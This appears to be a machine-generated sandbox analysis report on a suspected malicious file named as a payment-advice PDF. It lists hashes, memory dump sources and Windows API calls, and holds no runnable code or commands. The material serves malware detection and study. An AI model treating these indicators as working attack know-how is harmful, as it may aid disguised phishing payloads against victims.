                                                                                                                • Opcode ID: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
                                                                                                                • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                                                                                                                • Opcode Fuzzy Hash: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
                                                                                                                • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404B53
                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
                                                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                                                                                                                • SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00404C26
                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404D61
                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404D80
                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
                                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                                                                                                                • GlobalFree.KERNEL32(?), ref: 00404F60
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
                                                                                                                • ShowWindow.USER32(?,00000000), ref: 004050FF
                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                                                                                                                • ShowWindow.USER32(00000000), ref: 00405111
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                • String ID: $M$N
                                                                                                                • API String ID: 1638840714-813528018
                                                                                                                • Opcode ID: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
                                                                                                                • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
                                                                                                                • Opcode Fuzzy Hash: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
                                                                                                                • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: "$0oWp$LjWp$LjWp$LjWp$LjWp$LjWp$LjWp$LjWp$LjWp$PHtq$PHtq$PHtq$PHtq$PHtq$PHtq$PHtq$PHtq
                                                                                                                • API String ID: 0-4199745560
                                                                                                                • Opcode ID: 6562b2a989648763852dfc4df8ae6ba5e78965bb95710a46a52779bc05f03c4d
                                                                                                                • Instruction ID: 95e09da8af053e7403b36ef3710d6a62b90e24f72933ac301983937a61e45f0c
                                                                                                                • Opcode Fuzzy Hash: 6562b2a989648763852dfc4df8ae6ba5e78965bb95710a46a52779bc05f03c4d
                                                                                                                • Instruction Fuzzy Hash: 49328FB4E00218CFDB54CFA9C994B9DBBF2BB89304F1081A9D819AB361DB755E85CF50
                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(?,?,74DF3420,00441800,0043F000), ref: 0040586F
                                                                                                                • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058B7
                                                                                                                • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058DA
                                                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058E0
                                                                                                                • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058F0
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0040599F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                • String ID: \*.*
                                                                                                                • API String ID: 2035342205-1173974218
                                                                                                                • Opcode ID: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
                                                                                                                • Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
                                                                                                                • Opcode Fuzzy Hash: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
                                                                                                                • Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: "$0oWp$PHtq$PHtq$PHtq$PHtq$PHtq$PHtq$PHtq$PHtq
                                                                                                                • API String ID: 0-2345217451
                                                                                                                • Opcode ID: 1bbb49e110f1c78e30e526c7175e5540b8affa5f93e113fbd858833124b5e50d
                                                                                                                • Instruction ID: 0abf31b7a776d319de306235856cba47db68c39d67914f2b4d60980262e68383
                                                                                                                • Opcode Fuzzy Hash: 1bbb49e110f1c78e30e526c7175e5540b8affa5f93e113fbd858833124b5e50d
                                                                                                                • Instruction Fuzzy Hash: 29029FB4E012188FDB58CFA6C944BDDBBF2BB89304F1081A9D819AB361DB755E85CF50
                                                                                                                APIs
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 004064BA
                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 004064CE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressByteCharMultiProcWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 2508298434-0
                                                                                                                • Opcode ID: 7cc97ef94d81039f7db29c93a43e59d31856d54cbbd0e381ff79ba4d2542bd79
                                                                                                                • Instruction ID: cd95b2861820a739adb3220cbbcfd3957c6ea6b36a69c6e89c9fb6fa44223837
                                                                                                                • Opcode Fuzzy Hash: 7cc97ef94d81039f7db29c93a43e59d31856d54cbbd0e381ff79ba4d2542bd79
                                                                                                                • Instruction Fuzzy Hash: 83E086715041147EEB525B70CE09FF7366CEB14310F1002357D96E40D0EAB4DE558A68
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: BO7
                                                                                                                • API String ID: 0-2535304733
                                                                                                                • Opcode ID: d6aa422d92a37ccd0122ed4386c2961d23b777b06ce3abb4bc5e0c17a324b6a0
                                                                                                                • Instruction ID: 27f634f2a562203d2d842c61352a4ca76cfd01bf2511f93b5cdc49f3df361eb0
                                                                                                                • Opcode Fuzzy Hash: d6aa422d92a37ccd0122ed4386c2961d23b777b06ce3abb4bc5e0c17a324b6a0
                                                                                                                • Instruction Fuzzy Hash: 7D528C74A01268CFDB65DFA5C884BDDBBB2BF89301F1081E9D809AB255DB359E81CF50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: BO7
                                                                                                                • API String ID: 0-2535304733
                                                                                                                • Opcode ID: 0f5a22094b4910ce0e895bedf3b5aa1a97c0105cb662d5b3323669b9b309ceb2
                                                                                                                • Instruction ID: 9f4f0e8cea4f7d1622ea58e9fc94069ba7b2e553454bc751160b7def35571d2e
                                                                                                                • Opcode Fuzzy Hash: 0f5a22094b4910ce0e895bedf3b5aa1a97c0105cb662d5b3323669b9b309ceb2
                                                                                                                • Instruction Fuzzy Hash: 2DA19E74A05268CFDB65DF64C854BD9BBB2BF8A301F1085EAD80DA7250DB319E81CF51
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: BO7
                                                                                                                • API String ID: 0-2535304733
                                                                                                                • Opcode ID: 08c44e6cd156116bcfe0169d7354ef9a748246da9287cbe62fe62397aafa9bb1
                                                                                                                • Instruction ID: c62fe445ff46aa6fb21068f817f18ab2f7423ca9494d0a0212e70346168722cd
                                                                                                                • Opcode Fuzzy Hash: 08c44e6cd156116bcfe0169d7354ef9a748246da9287cbe62fe62397aafa9bb1
                                                                                                                • Instruction Fuzzy Hash: 5251B174A05228CFCB69DF64C854BEAB7B2BF4A301F5095E9D809A7350DB35AE81CF40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023076048.00000000374E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 374E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_374e0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 900504dfb7cb7893a98a727da1f96ee84ae2d0760bf36d5c3be5c4db37ac9207
                                                                                                                • Instruction ID: e79a9589aca9a24f546d27a3dda0f6ff31775e39834e0dce0498fab968a95203
                                                                                                                • Opcode Fuzzy Hash: 900504dfb7cb7893a98a727da1f96ee84ae2d0760bf36d5c3be5c4db37ac9207
                                                                                                                • Instruction Fuzzy Hash: 0AC1C0B4E00258CFDB54DFA5C984B9DBBB2BF89311F1081A9D409AB355DB34AE85CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023076048.00000000374E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 374E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_374e0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 71180cb8c61d73f483f6bfad92939e8826ff9afd933086e4c68ca3303e10fc22
                                                                                                                • Instruction ID: 298b27435ba3b3276e91d480c33c57d530c6f9c2ac20b103a79615992551a90c
                                                                                                                • Opcode Fuzzy Hash: 71180cb8c61d73f483f6bfad92939e8826ff9afd933086e4c68ca3303e10fc22
                                                                                                                • Instruction Fuzzy Hash: 8BC1D0B4E00258CFEB55DFA5C984B9DBBB2BF89305F1081A9D409AB355DB34AA81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d34509f7e4e603b9cf131db52f4c08f2de1e9961f9808c7cbf577c02ad77921f
                                                                                                                • Instruction ID: 5cbfc296137e65c290167c33e6fb25d99f2c2d07f3f26fcba1c475ac0c73457d
                                                                                                                • Opcode Fuzzy Hash: d34509f7e4e603b9cf131db52f4c08f2de1e9961f9808c7cbf577c02ad77921f
                                                                                                                • Instruction Fuzzy Hash: EAC1BEB4E00258CFDB54DFA5C994B9DBBB2BF89304F2080A9D819AB355DB359E81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a48f80b72645c7359d478a992f19e4ae01d03da708d34c8ac3d2a9aa0e029795
                                                                                                                • Instruction ID: 6962d216ba992ed82da166f166f9e02eaac3d8871efb601209a95aaeecb8a65d
                                                                                                                • Opcode Fuzzy Hash: a48f80b72645c7359d478a992f19e4ae01d03da708d34c8ac3d2a9aa0e029795
                                                                                                                • Instruction Fuzzy Hash: DBC1C0B4E00258CFDB54DFA5C994B9DBBB2BF88304F1080A9D819AB355DB349E81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 85b346cdb62a03aab736afcb84e7377515d1302e2d807e1990df1ae729045b98
                                                                                                                • Instruction ID: 1c4265029f9b9d7fbab734e3fa44b9d88b95aa974d86257188636fae26dfc4cf
                                                                                                                • Opcode Fuzzy Hash: 85b346cdb62a03aab736afcb84e7377515d1302e2d807e1990df1ae729045b98
                                                                                                                • Instruction Fuzzy Hash: 21C1D0B4E00258CFDB54DFA5C984B9DBBB2BF89300F1080A9D819AB355DB349E81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 25fd35472a9fe557f18b419f30872aafdbd8e546a038aaa19ff0dee7b5aa082f
                                                                                                                • Instruction ID: 092fe26a672a66c51097c9e2391ea4c1ecac237402b88d22dc11bb7039106b85
                                                                                                                • Opcode Fuzzy Hash: 25fd35472a9fe557f18b419f30872aafdbd8e546a038aaa19ff0dee7b5aa082f
                                                                                                                • Instruction Fuzzy Hash: 17C1CEB4E00258CFDB54DFA5C984B9DBBB2BF89304F2080A9D819AB355DB349E81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: dac308ddee10b4cd7c957a7c2da6517b6ea72cc6cf8dd0666892bc75671353a5
                                                                                                                • Instruction ID: 791f762612fa0374530fd7af7d7336fc30dcce9994bec3ab93245eb04f4d4be9
                                                                                                                • Opcode Fuzzy Hash: dac308ddee10b4cd7c957a7c2da6517b6ea72cc6cf8dd0666892bc75671353a5
                                                                                                                • Instruction Fuzzy Hash: E8C1CDB4E00258CFDB54DFA5C994B9DBBB2AF89300F2080A9D819AB355DB359E81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 25009bbeafe37c8b0d2056352dd5555643a0229bacb5bccd20fd6d465f35b6af
                                                                                                                • Instruction ID: 79d7937fb16344c30b88a801ee1b86b542111c58bdd48e13aad78ac32f353f80
                                                                                                                • Opcode Fuzzy Hash: 25009bbeafe37c8b0d2056352dd5555643a0229bacb5bccd20fd6d465f35b6af
                                                                                                                • Instruction Fuzzy Hash: 64C1DFB4E00258CFDB14DFA5C994B9DBBB2AF89300F2080A9D819BB355DB359E85CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b0f45073424b170ff04fd7d9942187dd6a6db7578b0f4ed4488572462b99d1a1
                                                                                                                • Instruction ID: 96ac0eee43901ae0eb1d8780a2739a1a358b66794587c7c84465b033067091b5
                                                                                                                • Opcode Fuzzy Hash: b0f45073424b170ff04fd7d9942187dd6a6db7578b0f4ed4488572462b99d1a1
                                                                                                                • Instruction Fuzzy Hash: 46C1CEB4E00258CFDB54DFA5C994B9DBBB2BF89304F2080A9D809AB355DB359E81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b52dd9ccc345a86e7e91686c4a83e5b334fdc41d9f062c937dbefe58f7b8ecdf
                                                                                                                • Instruction ID: 20779669761c182a6bdb9cbd3dfa96fd42a19ecb5ac7e2f30c19ce15e3ed3592
                                                                                                                • Opcode Fuzzy Hash: b52dd9ccc345a86e7e91686c4a83e5b334fdc41d9f062c937dbefe58f7b8ecdf
                                                                                                                • Instruction Fuzzy Hash: 3CC1CDB4E00258CFDB55DFA5C984B9DBBB2AF89304F2080A9D819BB355DB349E85CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 378f297f441226546d9a342dac3bcf6426ca69152c0dd5f802df2201379cefb3
                                                                                                                • Instruction ID: bb8b1a85f379e96383c37535bfb69f56515b218a5d155c85bde1d1ff234e7792
                                                                                                                • Opcode Fuzzy Hash: 378f297f441226546d9a342dac3bcf6426ca69152c0dd5f802df2201379cefb3
                                                                                                                • Instruction Fuzzy Hash: 9AC1C1B4E00258CFDB54DFA5C994BADBBB2AF89304F1080A9D819AB355DB359E81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 994916c1768dff830cb37f1bb917981e95f778c9e1095c062770679df726d51b
                                                                                                                • Instruction ID: 7c169339dd74dc902296942a09f542b4ec4b56151d84cdadffbdf8d05bcfb9cd
                                                                                                                • Opcode Fuzzy Hash: 994916c1768dff830cb37f1bb917981e95f778c9e1095c062770679df726d51b
                                                                                                                • Instruction Fuzzy Hash: 8FC1C1B4E00258CFDB14DFA5C994B9DBBB2BF89304F2081A9D819AB355DB359E81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 06d69d444219637a58ba3ebfea9e145953717e8fe02450475ce5af87a9b97f1c
                                                                                                                • Instruction ID: a9f9672f38a97b44a8fcd02575db2b0a31bea04f78d3c3cb70c905711ef12f55
                                                                                                                • Opcode Fuzzy Hash: 06d69d444219637a58ba3ebfea9e145953717e8fe02450475ce5af87a9b97f1c
                                                                                                                • Instruction Fuzzy Hash: E7C1CDB4E00258CFDB54DFA5C984B9DBBB2BF89305F2080A9D819AB355DB349E81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 079d606c4fc8a51d2ea1d4d1fcc3959bdc58e833a342d05f72e30070d54c2d5f
                                                                                                                • Instruction ID: 72ea1ad63afbc42f3564b04cd9df5cdfe62c68179d15f8f76b1dbccee549fd6e
                                                                                                                • Opcode Fuzzy Hash: 079d606c4fc8a51d2ea1d4d1fcc3959bdc58e833a342d05f72e30070d54c2d5f
                                                                                                                • Instruction Fuzzy Hash: 04C1CEB4E00258CFDB14DFA5C994B9DBBB2BF89304F2080A9D819AB355DB359E81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 71d96bc1e5d1c3b08d5e3575da47c1f0b0996e005949dfdac6c38ba60661845b
                                                                                                                • Instruction ID: a6a6e951a1358a3672f72beb58039d2d96e75f247dfaf022850e76c02ab07b69
                                                                                                                • Opcode Fuzzy Hash: 71d96bc1e5d1c3b08d5e3575da47c1f0b0996e005949dfdac6c38ba60661845b
                                                                                                                • Instruction Fuzzy Hash: E8C1DFB4E00258CFDB54DFA5C994B9DBBB2BF88300F2080A9D819AB355DB359E81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b0989fba6df97154b41e34a147857189917a6cc623f5fb87840890eef8a0f54e
                                                                                                                • Instruction ID: bd81e85f1884575aa27cf18651faa6f4119b4a0ad96e1ed8a460079dc19026a9
                                                                                                                • Opcode Fuzzy Hash: b0989fba6df97154b41e34a147857189917a6cc623f5fb87840890eef8a0f54e
                                                                                                                • Instruction Fuzzy Hash: 75C1BEB4E00258CFDB54DFA5C994B9DBBB2BF89304F2080A9D819AB355DB349E81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
